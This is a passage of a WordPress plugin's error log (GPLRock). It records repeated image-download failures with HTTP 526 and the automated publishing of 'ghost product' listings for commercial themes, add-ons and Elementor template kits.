(attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:46 UTC] GPLRock: Image download failed for product konstructo-construction-and-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konstructo---construction-and-architecture-wordpress-theme-19853.webp for product konstructo-construction-and-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:49 UTC] GPLRock: Image download failed for product konstructo-construction-and-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:51 UTC] GPLRock: Image download failed for product konstructo-construction-and-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konstructo---construction-and-architecture-wordpress-theme-19853.webp for product konstructo-construction-and-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:53 UTC] GPLRock WARNING: Image download failed for product konstructo-construction-and-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/konstructo---construction-and-architecture-wordpress-theme-19853.webp [05-Apr-2026 06:49:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: konstructo-construction-and-architecture-wordpress-theme [05-Apr-2026 06:50:22 UTC] GPLRock: Image downloaded successfully for product booknetic-coupons-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-066d48e5.webp [05-Apr-2026 06:50:22 UTC] GPLRock: Using pre-downloaded image for product booknetic-coupons-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-066d48e5.webp [05-Apr-2026 06:50:22 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-coupons-addon [05-Apr-2026 06:50:23 UTC] GPLRock: Image downloaded successfully for product booknetic-invoices-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d6db04a0.webp [05-Apr-2026 06:50:23 UTC] GPLRock: Using pre-downloaded image for product booknetic-invoices-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d6db04a0.webp [05-Apr-2026 06:50:23 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-invoices-addon [05-Apr-2026 06:50:25 UTC] GPLRock: Image downloaded successfully for product booknetic-taxes-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca85f51e.webp [05-Apr-2026 06:50:25 UTC] GPLRock: Using pre-downloaded image for product booknetic-taxes-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca85f51e.webp [05-Apr-2026 06:50:25 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-taxes-addon [05-Apr-2026 06:50:26 UTC] GPLRock: Image downloaded successfully for product booknetic-woocommerce-integration-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3629e7d.webp [05-Apr-2026 06:50:26 UTC] GPLRock: Using pre-downloaded image for product booknetic-woocommerce-integration-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3629e7d.webp [05-Apr-2026 06:50:26 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-woocommerce-integration-addon [05-Apr-2026 06:50:28 UTC] GPLRock: Image downloaded successfully for product booknetic-mollie-payments-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e20f61e6.webp [05-Apr-2026 06:50:28 UTC] GPLRock: Using pre-downloaded image for product booknetic-mollie-payments-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e20f61e6.webp [05-Apr-2026 06:50:28 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-mollie-payments-addon [05-Apr-2026 06:50:29 UTC] GPLRock: Image downloaded successfully for product booknetic-square-payments-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa6dff00.webp [05-Apr-2026 06:50:29 UTC] GPLRock: Using pre-downloaded image for product booknetic-square-payments-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa6dff00.webp [05-Apr-2026 06:50:29 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-square-payments-addon [05-Apr-2026 06:50:30 UTC] GPLRock: Image downloaded successfully for product booknetic-stripe-payments-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f1857b0e.webp [05-Apr-2026 06:50:30 UTC] GPLRock: Using pre-downloaded image for product booknetic-stripe-payments-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f1857b0e.webp [05-Apr-2026 06:50:30 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-stripe-payments-addon [05-Apr-2026 06:50:32 UTC] GPLRock: Image downloaded successfully for product booknetic-paypal-payments-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38fe8520.webp [05-Apr-2026 06:50:32 UTC] GPLRock: Using pre-downloaded image for product booknetic-paypal-payments-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38fe8520.webp [05-Apr-2026 06:50:32 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-paypal-payments-addon [05-Apr-2026 06:50:33 UTC] GPLRock: Image downloaded successfully for product booknetic-whatsapp-notifications-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-17c759b8.webp [05-Apr-2026 06:50:33 UTC] GPLRock: Using pre-downloaded image for product booknetic-whatsapp-notifications-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-17c759b8.webp [05-Apr-2026 06:50:33 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-whatsapp-notifications-addon [05-Apr-2026 06:50:35 UTC] GPLRock: Image downloaded successfully for product booknetic-sms-notifications-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6fec148d.webp [05-Apr-2026 06:50:35 UTC] GPLRock: Using pre-downloaded image for product booknetic-sms-notifications-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6fec148d.webp [05-Apr-2026 06:50:35 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-sms-notifications-addon [05-Apr-2026 06:51:20 UTC] GPLRock: Image download failed for product amoja-resort-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:23 UTC] GPLRock: Image download failed for product amoja-resort-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amoja---resort--hotel-wordpress-theme-1048.webp for product amoja-resort-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:25 UTC] GPLRock: Image download failed for product amoja-resort-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:27 UTC] GPLRock: Image download failed for product amoja-resort-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amoja---resort--hotel-wordpress-theme-1048.webp for product amoja-resort-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:29 UTC] GPLRock WARNING: Image download failed for product amoja-resort-hotel-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amoja---resort--hotel-wordpress-theme-1048.webp [05-Apr-2026 06:51:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amoja-resort-hotel-wordpress-theme [05-Apr-2026 06:51:29 UTC] GPLRock: Image download failed for product upsoft-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:31 UTC] GPLRock: Image download failed for product upsoft-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/upsoft--startup--saas-wordpress-theme-11481.webp for product upsoft-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:33 UTC] GPLRock: Image download failed for product upsoft-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:35 UTC] GPLRock: Image download failed for product upsoft-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/upsoft--startup--saas-wordpress-theme-11481.webp for product upsoft-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:38 UTC] GPLRock WARNING: Image download failed for product upsoft-startup-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/upsoft--startup--saas-wordpress-theme-11481.webp [05-Apr-2026 06:51:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: upsoft-startup-saas-wordpress-theme [05-Apr-2026 06:51:38 UTC] GPLRock: Image downloaded successfully for product nedril-creative-agency-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a320cb9.webp [05-Apr-2026 06:51:38 UTC] GPLRock: Using pre-downloaded image for product nedril-creative-agency-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a320cb9.webp [05-Apr-2026 06:51:38 UTC] GPLRock: Ghost product published with image - Product ID: nedril-creative-agency-portfolio-wordpress-theme [05-Apr-2026 06:51:38 UTC] GPLRock: Image download failed for product flavius-lawyer-and-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:40 UTC] GPLRock: Image download failed for product flavius-lawyer-and-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flavius---lawyer-and-attorney-wordpress-theme-9641.webp for product flavius-lawyer-and-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:42 UTC] GPLRock: Image download failed for product flavius-lawyer-and-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:44 UTC] GPLRock: Image download failed for product flavius-lawyer-and-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flavius---lawyer-and-attorney-wordpress-theme-9641.webp for product flavius-lawyer-and-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:46 UTC] GPLRock WARNING: Image download failed for product flavius-lawyer-and-attorney-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/flavius---lawyer-and-attorney-wordpress-theme-9641.webp [05-Apr-2026 06:51:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flavius-lawyer-and-attorney-wordpress-theme [05-Apr-2026 06:51:46 UTC] GPLRock: Image download failed for product sobeau-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:49 UTC] GPLRock: Image download failed for product sobeau-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sobeau---elementor-woocommerce-theme-32497.webp for product sobeau-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:51 UTC] GPLRock: Image download failed for product sobeau-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:53 UTC] GPLRock: Image download failed for product sobeau-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sobeau---elementor-woocommerce-theme-32497.webp for product sobeau-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:55 UTC] GPLRock WARNING: Image download failed for product sobeau-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/sobeau---elementor-woocommerce-theme-32497.webp [05-Apr-2026 06:51:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sobeau-elementor-woocommerce-theme [05-Apr-2026 06:51:55 UTC] GPLRock: Image download failed for product sona-digital-marketing-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:57 UTC] GPLRock: Image download failed for product sona-digital-marketing-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:51:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sona---digital-marketing-agency-wordpress-20687.webp for product sona-digital-marketing-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:51:59 UTC] GPLRock: Image download failed for product sona-digital-marketing-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:02 UTC] GPLRock: Image download failed for product sona-digital-marketing-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sona---digital-marketing-agency-wordpress-20687.webp for product sona-digital-marketing-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:04 UTC] GPLRock WARNING: Image download failed for product sona-digital-marketing-agency-wordpress. URL: https://meldwp.com/wp-content/uploads/sona---digital-marketing-agency-wordpress-20687.webp [05-Apr-2026 06:52:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sona-digital-marketing-agency-wordpress [05-Apr-2026 06:52:04 UTC] GPLRock: Image downloaded successfully for product therma-spa-and-wellness-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd8d7b9e.webp [05-Apr-2026 06:52:04 UTC] GPLRock: Using pre-downloaded image for product therma-spa-and-wellness-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd8d7b9e.webp [05-Apr-2026 06:52:04 UTC] GPLRock: Ghost product published with image - Product ID: therma-spa-and-wellness-wordpress-theme [05-Apr-2026 06:52:04 UTC] GPLRock: Image download failed for product starwoo-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:06 UTC] GPLRock: Image download failed for product starwoo-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/starwoo-wp---multipurpose-elementor-woocommerce-theme-5870.webp for product starwoo-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:08 UTC] GPLRock: Image download failed for product starwoo-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:10 UTC] GPLRock: Image download failed for product starwoo-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/starwoo-wp---multipurpose-elementor-woocommerce-theme-5870.webp for product starwoo-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:13 UTC] GPLRock WARNING: Image download failed for product starwoo-wp-multipurpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/starwoo-wp---multipurpose-elementor-woocommerce-theme-5870.webp [05-Apr-2026 06:52:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: starwoo-wp-multipurpose-elementor-woocommerce-theme [05-Apr-2026 06:52:13 UTC] GPLRock: Image download failed for product ovix-digital-agency-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:15 UTC] GPLRock: Image download failed for product ovix-digital-agency-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ovix---digital-agency--creative-portfolio-wordpress-theme-21261.webp for product ovix-digital-agency-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:17 UTC] GPLRock: Image download failed for product ovix-digital-agency-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:19 UTC] GPLRock: Image download failed for product ovix-digital-agency-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ovix---digital-agency--creative-portfolio-wordpress-theme-21261.webp for product ovix-digital-agency-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:21 UTC] GPLRock WARNING: Image download failed for product ovix-digital-agency-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ovix---digital-agency--creative-portfolio-wordpress-theme-21261.webp [05-Apr-2026 06:52:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ovix-digital-agency-creative-portfolio-wordpress-theme [05-Apr-2026 06:52:21 UTC] GPLRock: Image download failed for product technex-technology-software-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:23 UTC] GPLRock: Image download failed for product technex-technology-software-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/technex---technology--software-wordpress-elementor-theme-18034.webp for product technex-technology-software-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:26 UTC] GPLRock: Image download failed for product technex-technology-software-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:28 UTC] GPLRock: Image download failed for product technex-technology-software-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:52:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/technex---technology--software-wordpress-elementor-theme-18034.webp for product technex-technology-software-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:52:30 UTC] GPLRock WARNING: Image download failed for product technex-technology-software-wordpress-elementor-theme. URL: https://meldwp.com/wp-content/uploads/technex---technology--software-wordpress-elementor-theme-18034.webp [05-Apr-2026 06:52:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: technex-technology-software-wordpress-elementor-theme [05-Apr-2026 06:52:48 UTC] GPLRock: Image downloaded successfully for product fronttwo-creative-studio-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-692f2f24.webp [05-Apr-2026 06:52:48 UTC] GPLRock: Using pre-downloaded image for product fronttwo-creative-studio-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-692f2f24.webp [05-Apr-2026 06:52:48 UTC] GPLRock: Ghost product published with image - Product ID: fronttwo-creative-studio-template-kit [05-Apr-2026 06:52:49 UTC] GPLRock: Image downloaded successfully for product frontthree-creative-studio-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc1b6eb8.webp [05-Apr-2026 06:52:49 UTC] GPLRock: Using pre-downloaded image for product frontthree-creative-studio-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc1b6eb8.webp [05-Apr-2026 06:52:49 UTC] GPLRock: Ghost product published with image - Product ID: frontthree-creative-studio-template-kit [05-Apr-2026 06:52:51 UTC] GPLRock: Image downloaded successfully for product frontsix-creative-photography-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-407476af.webp [05-Apr-2026 06:52:51 UTC] GPLRock: Using pre-downloaded image for product frontsix-creative-photography-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-407476af.webp [05-Apr-2026 06:52:51 UTC] GPLRock: Ghost product published with image - Product ID: frontsix-creative-photography-template-kit [05-Apr-2026 06:52:52 UTC] GPLRock: Image downloaded successfully for product foodsense-food-delivery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2938d2b4.webp [05-Apr-2026 06:52:52 UTC] GPLRock: Using pre-downloaded image for product foodsense-food-delivery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2938d2b4.webp [05-Apr-2026 06:52:52 UTC] GPLRock: Ghost product published with image - Product ID: foodsense-food-delivery-elementor-template-kit [05-Apr-2026 06:52:54 UTC] GPLRock: Image downloaded successfully for product foodo-fast-food-pizza-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fee520d5.webp [05-Apr-2026 06:52:54 UTC] GPLRock: Using pre-downloaded image for product foodo-fast-food-pizza-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fee520d5.webp [05-Apr-2026 06:52:54 UTC] GPLRock: Ghost product published with image - Product ID: foodo-fast-food-pizza-elementor-template-kit [05-Apr-2026 06:52:55 UTC] GPLRock: Image downloaded successfully for product foodkit-restaurant-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0756ad8.webp [05-Apr-2026 06:52:55 UTC] GPLRock: Using pre-downloaded image for product foodkit-restaurant-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0756ad8.webp [05-Apr-2026 06:52:55 UTC] GPLRock: Ghost product published with image - Product ID: foodkit-restaurant-template-kit [05-Apr-2026 06:52:56 UTC] GPLRock: Image downloaded successfully for product fooditi-restaurant-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f74c037e.webp [05-Apr-2026 06:52:57 UTC] GPLRock: Using pre-downloaded image for product fooditi-restaurant-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f74c037e.webp [05-Apr-2026 06:52:57 UTC] GPLRock: Ghost product published with image - Product ID: fooditi-restaurant-cafe-elementor-template-kit [05-Apr-2026 06:52:58 UTC] GPLRock: Image downloaded successfully for product foodie-fast-food-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e26d9e29.webp [05-Apr-2026 06:52:58 UTC] GPLRock: Using pre-downloaded image for product foodie-fast-food-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e26d9e29.webp [05-Apr-2026 06:52:58 UTC] GPLRock: Ghost product published with image - Product ID: foodie-fast-food-elementor-template-kit [05-Apr-2026 06:52:59 UTC] GPLRock: Image downloaded successfully for product fooddelivery-local-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0dced803.webp [05-Apr-2026 06:52:59 UTC] GPLRock: Using pre-downloaded image for product fooddelivery-local-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0dced803.webp [05-Apr-2026 06:53:00 UTC] GPLRock: Ghost product published with image - Product ID: fooddelivery-local-business-elementor-template-kit [05-Apr-2026 06:53:01 UTC] GPLRock: Image downloaded successfully for product foliokit-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65734521.webp [05-Apr-2026 06:53:01 UTC] GPLRock: Using pre-downloaded image for product foliokit-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65734521.webp [05-Apr-2026 06:53:01 UTC] GPLRock: Ghost product published with image - Product ID: foliokit-personal-portfolio-elementor-template-kit [05-Apr-2026 06:54:00 UTC] GPLRock: Image download failed for product liftsupply-single-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:02 UTC] GPLRock: Image download failed for product liftsupply-single-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liftsupply---single-product-woocommerce-wordpress-theme-9943.webp for product liftsupply-single-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:04 UTC] GPLRock: Image download failed for product liftsupply-single-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:06 UTC] GPLRock: Image download failed for product liftsupply-single-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liftsupply---single-product-woocommerce-wordpress-theme-9943.webp for product liftsupply-single-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:08 UTC] GPLRock WARNING: Image download failed for product liftsupply-single-product-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/liftsupply---single-product-woocommerce-wordpress-theme-9943.webp [05-Apr-2026 06:54:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: liftsupply-single-product-woocommerce-wordpress-theme [05-Apr-2026 06:54:08 UTC] GPLRock: Image download failed for product zyra-fullscreen-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:10 UTC] GPLRock: Image download failed for product zyra-fullscreen-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zyra---fullscreen-photography-wordpress-theme-2216.webp for product zyra-fullscreen-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:13 UTC] GPLRock: Image download failed for product zyra-fullscreen-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:15 UTC] GPLRock: Image download failed for product zyra-fullscreen-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zyra---fullscreen-photography-wordpress-theme-2216.webp for product zyra-fullscreen-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:17 UTC] GPLRock WARNING: Image download failed for product zyra-fullscreen-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zyra---fullscreen-photography-wordpress-theme-2216.webp [05-Apr-2026 06:54:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zyra-fullscreen-photography-wordpress-theme [05-Apr-2026 06:54:17 UTC] GPLRock: Image download failed for product dina-restaurant-cafe-food-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:19 UTC] GPLRock: Image download failed for product dina-restaurant-cafe-food-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dina---restaurant-cafe-food-theme-1318.webp for product dina-restaurant-cafe-food-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:21 UTC] GPLRock: Image download failed for product dina-restaurant-cafe-food-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:23 UTC] GPLRock: Image download failed for product dina-restaurant-cafe-food-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dina---restaurant-cafe-food-theme-1318.webp for product dina-restaurant-cafe-food-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:25 UTC] GPLRock WARNING: Image download failed for product dina-restaurant-cafe-food-theme. URL: https://meldwp.com/wp-content/uploads/dina---restaurant-cafe-food-theme-1318.webp [05-Apr-2026 06:54:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product 